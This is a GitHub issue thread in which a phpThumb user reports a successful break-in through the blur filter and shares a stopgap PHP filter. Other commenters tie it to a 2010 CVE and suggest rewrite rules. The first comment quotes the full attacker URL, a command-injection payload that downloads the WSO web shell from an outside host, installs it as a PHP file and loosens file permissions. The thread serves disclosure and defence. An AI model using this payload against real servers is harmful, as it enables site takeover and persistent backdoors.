Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerability and Successfull Hacked #109

Open
ChrisWesterfield opened this issue Mar 5, 2018 · 3 comments
Open

Vulnerability and Successfull Hacked #109

ChrisWesterfield opened this issue Mar 5, 2018 · 3 comments

Comments

@ChrisWesterfield
Copy link

ChrisWesterfield commented Mar 5, 2018
edited
Loading

Hi,

we where hacked today through the thumbnailer.
I just wanted to share details on this one and giving feedback how we blocked this stuff out of our system.

I'm not 100% shure although if this applies to the current version but you can try it with the full url that whe where attacket with:

The Attacker used this URL:

phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20chmod%20777%20*%20.%20-R%20;%20wget%20https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt%20;%20curl%20-O%20https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt%20;%20lwp-download%20https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt%20;%20mv%20wso.txt%20phpThumb.hb.php%20;%20chmod%20555%20.%20phpThumb.hb.php%20;%20ls%20-al%20;%20&phpThumbDebug=9

As you can see he injected console calls into the blur filter.
This Code was executed and always created an phpTumb.hb.php

We blocked this attack temporary by adding this into the first line after <?php

`

foreach($_GET as $id=>$value)
{
if(is_array($value))
{
foreach($value as $subValue)
{
$subValue = urldecode($subValue);
if(strpos($subValue, ' chmod ') !== false || strpos($subValue, 'chmod') !== false )
{
die('file not found!');
}
}
}
else
{
$subValue = urldecode($value);
if(strpos($value, ' chmod ') !== false || strpos($value, 'chmod') !== false )
{
die('file not found!');
}
}
}

`

This is only an temporary fix for us, as we will move routines into our WAF to protect us from these sneaky attacks.

We just wanted to share this with the community as an first quick fix.
@ggppdk
Copy link
Contributor

ggppdk commented Mar 5, 2018

This sounds exactly like the 2010 security issue of phpThumb 1.7.9

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1598
http://stopmalvertising.com/security/phpthumb-fltr-command-injection-vulnerability-exploit-scans.html

which version are you running ?

@Georgi-Todorov
Copy link

The URL parameters are very useful and I LOVE all the functionality of phpThumb, but the way the parameters were structured and designed are really poor. Special characters for command injection are being used, which shouldn't have.
There's no effective, quick way of cleaning the passed URL parameters, without breaking the phpThumb functionality.
What you can do instead is rename phpThumb.php and move it outside of the phpThumb directory.
Add a server config rewrite rule and set a new rule with your custom parameters for every function you need.
E.g.: https://domain.tld/phpthumb/loadImage.php?zc=1&w=75&h=25src=http://image.com/png.jpg
becomes
https://domain.tld/zoomed/75/25/png.jpg
or anything along those lines that you like.

@arturmamedov
Copy link
Contributor

So?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@arturmamedov @ChrisWesterfield @ggppdk @Georgi-Todorov